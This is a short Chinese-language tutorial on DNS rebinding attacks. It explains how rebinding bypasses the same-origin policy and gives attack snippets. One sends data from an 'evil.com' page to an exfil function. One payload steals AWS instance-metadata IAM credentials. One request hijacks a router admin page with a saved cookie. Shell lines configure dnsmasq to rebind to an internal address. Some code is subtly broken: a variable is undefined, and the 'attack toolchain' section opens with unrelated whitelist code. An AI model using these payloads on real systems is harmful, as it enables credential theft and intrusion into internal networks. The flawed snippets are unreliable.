DNS重绑定攻击：绕过同源策略的幽灵渗透

1. 漏洞核心原理

DNS重绑定（DNS Rebinding） 是一种利用DNS TTL过期机制，绕过浏览器同源策略（SOP）的攻击技术。攻击者通过控制域名解析，使同一域名在会话期间指向不同IP（如内网地址），实现对内部系统的访问。

攻击三要素：

1. 可控域名：攻击者拥有可快速更新DNS记录的域名

2. 短TTL设置：DNS记录存活时间极短（如1秒）

3. 未验证Host头：目标服务仅依赖域名验证

2. 攻击类型与实战复现

(1) 基础内网渗透

// 恶意页面代码
let attackerDomain = "evil.com"; // 初始解析到攻击者IP（如1.2.3.4）
fetch(`http://${attackerDomain}/api`)
  .then(response => response.text())
  .then(data => exfil(data));

// DNS记录变更流程：
// 1. 首次解析 evil.com → 1.2.3.4（通过浏览器验证）
// 2. TTL过期后 evil.com → 192.168.1.1（攻击内网路由器）

(2) 云元数据服务攻击

# 利用AWS IMDSv1（无Hop限制）
rebinding_target = "169.254.169.254" 
js_payload = f"""
fetch('http://{attackerDomain}/latest/meta-data/iam/security-credentials/')
  .then(r => r.text()).then(d => top.postMessage(d,'*'))
"""

(3) 硬件设备控制（IoT案例）

GET /cgi-bin/luci/admin/network/wireless HTTP/1.1
Host: evil.com  # 重绑定后指向路由器IP（192.168.0.1）
Referer: http://evil.com
Cookie: sysauth=admin;  # 利用已保存Cookie

3. 自动化攻击工具链

// 强制域名白名单
const ALLOWED_DOMAINS = ['trusted.com'];
if (!ALLOWED_DOMAINS.includes(new URL(url).hostname)) {
  throw new Error("Domain not allowed");
}

# 使用FakeDNS设置短TTL
echo "evil.com 1 IN A 1.2.3.4" > zonefile
echo "evil.com 1 IN A 192.168.1.1" >> zonefile
dnsmasq -d -C zonefile